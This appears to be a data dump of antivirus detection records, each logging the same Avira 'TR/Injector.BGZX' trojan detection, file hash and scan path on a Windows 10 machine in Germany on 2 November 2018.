  Row(detection=Row(filename='avscan-20181102-055058-3e0fb16f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055058-3E0FB16F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054052-d478a1f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054052-D478A1F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053502-03f071a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053502-03F071A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053640-3eb32430', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053640-3EB32430', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053640-3ed5aa61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053640-3ED5AA61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053656-48348f7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053656-48348F7E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055315-8fd7bd76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055315-8FD7BD76', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061757-031c511d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061757-031C511D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061757-02de2321', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061757-02DE2321', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062557-214c495c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062557-214C495C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060901-c33de0a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060901-C33DE0A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061818-0f7d3e5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061818-0F7D3E5D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061851-231290b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061851-231290B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061738-f7d9eb09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061738-F7D9EB09', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062102-70ee7f50', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062102-70EE7F50', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061851-2329cc81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061851-2329CC81', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062544-19552b07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062544-19552B07', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053649-4411ab4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053649-4411AB4F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060852-be450b31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060852-BE450B31', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061749-fdf929cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061749-FDF929CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055014-23716fbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055014-23716FBF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053615-2fdd7418', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053615-2FDD7418', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060823-acff1e4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060823-ACFF1E4B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053636-3c04655e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053636-3C04655E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051620-672c0a93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051620-672C0A93', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061740-f89c03f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061740-F89C03F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060807-a356aaa9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060807-A356AAA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061847-207c41a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061847-207C41A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061705-e3e8e919', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061705-E3E8E919', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053603-28b23729', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053603-28B23729', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051626-6b24d3ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051626-6B24D3EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061705-e42204c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061705-E42204C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053634-3b178b2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053634-3B178B2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051637-717f0430', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051637-717F0430', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060802-a04e25ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060802-A04E25ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055347-a28380bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055347-A28380BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061805-079742d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061805-079742D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061704-e37fe2c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061704-E37FE2C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053609-2bcf1121', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053609-2BCF1121', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051637-71612cfe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051637-71612CFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060857-c156281f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060857-C156281F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055348-a317fb00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055348-A317FB00', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055352-a5d17064', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055352-A5D17064', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053608-2b8e78a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053608-2B8E78A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055303-88367c47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055303-88367C47', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060814-a788d3f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060814-A788D3F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055347-a2875991', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055347-A2875991', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061737-f737d098', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061737-F737D098', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055312-8df9e227', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055312-8DF9E227', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061652-dc34acc4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061652-DC34ACC4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051651-79d7cad8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051651-79D7CAD8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061733-f4d59ece', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061733-F4D59ECE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051623-6931c253', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051623-6931C253', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052701-e57100f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052701-E57100F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060851-bdc2693a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060851-BDC2693A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:50Z'), dt=datetime.date(2018, 11, 2)),
